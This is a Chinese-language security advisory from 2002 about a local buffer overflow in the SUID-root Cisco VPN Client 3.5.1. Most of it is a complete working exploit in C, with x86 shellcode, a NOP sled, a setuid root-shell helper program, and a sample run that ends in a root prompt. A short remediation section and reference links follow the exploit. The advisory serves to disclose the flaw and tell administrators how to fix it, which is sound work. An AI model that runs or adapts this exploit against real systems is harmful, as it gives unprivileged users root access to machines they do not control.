Cisco VPN Client for Unix存在本地缓冲溢出发布时间:2002-06-22 更新时间:2002-06-22 严重程度:高 威胁程度:本地管理员权限 错误类型:边界检查错误 利用方式:服务器模式 BUGTRAQ ID:5056 受影响系统 Cisco VPN Client 3.5.1 for Solaris详细描述 Cisco VPN客户端软件用于连接CISCO VPN网络。 其中Cisco VPN客户端存在漏洞,如果超长的profile名称传递给Cisco VPN客户端,就可以导致缓冲溢出,由于Cisco VPN客户端以SUID ROOT权限运行,利用此漏洞可以获得ROOT权限。 测试代码 /* buffer overflow for cisco's vpnclient for linux tested against the latest release: vpnclient-linux-3.5.1.Rel-k9.tar.gz to get this to properly work, you need to put the following code into xx.c, compile it (as xx), and place the executable into /tmp (to bypass tight PAM restrictions) #include <stdio.h> main() { setuid(0); execl("/bin/sh", "sh", NULL); } then compile this and run it. syntax is ./vpnclient <offset> tested under gentoo linux and debian: $ ls -la `which vpnclient` -rws--x--x 1 root root 160900 Apr 13 22:34 /usr/local/bin/vpnclient $ ./vpnKILLient addr: 0xbffffbac, offset: 0 Cisco Systems VPN Client Version 3.5.1 (Rel) Copyright (C) 1998-2002 Cisco Systems, Inc. All Rights Reserved. Client Type(s): Linux Running on: Linux 2.4.17 #1 Sat Apr 13 21:53:52 EDT 2002 i686 sh-2.05a# id uid=0(root) gid=100(users) groups=100(users),10(wheel) greetz: all of the angrypacket crew (of course) shok -> pheerable^2; vegac -> 31336++; when you get a chance, check out http://sec.angrypacket.com */ #include <stdio.h> #include <string.h> #include <unistd.h> #define NOP 0x90 #define LEN 620 /* 520 to own eip */ /* shellcode by vegac (setuid(0)->/tmp/xx) */ /* wont work if your /tmp partition is mounted noexec or nosuid */ char shell[]= "\x31\xc0\x31\xdb\xb0\x17\xcd\x80" "\x31\xc0\x50\x68\x2f\x2f\x78\x78" "\x68\x2f\x74\x6d\x70\x89\xe3\x31" "\xc0\x50\x89\xe2\x54\x89\xe1\xb0" "\x0b\xcd\x80\x00"; unsigned long get_sp (void) { __asm__("mov %esp,%eax"); } int main(int argc, char *argv[]) { int i, offset=0; long addr; char *buf, *ptr; if(argc > 1) offset = atoi(argv[1]); buf = (char *)malloc(sizeof(char) * LEN); bzero(buf, LEN); addr = get_sp() - offset; printf("addr: 0x%x, offset: %d\n", addr, offset); for(i = 0; i < LEN; i += 4) { *(long *)&buf[i] = addr; } for(i = 0; i < (LEN / 2); i++) { *(buf + i) = NOP; } ptr = buf + ((LEN / 2) - (strlen(shell) / 2)); for(i = 0; i < strlen(shell); i++) { *(ptr++) = shell[i]; } buf[LEN - 1] = '\0'; execl("/usr/local/bin/vpnclient", "vpnclient", "connect", buf, 0); return(0); } 解决方案 /bin/chmod 755 /usr/local/bin/vpnclient 或者使用3.5.2版本: http://www.cisco.com/public/sw-center/ 相关信息 methodic <methodic@bigunz.angrypacket.com> 参考:http://online.securityfocus.com/advisories/4214 http://online.securityfocus.com/archive/1/277653 相关主页:http://www.cisco.com/public/sw-center/ |
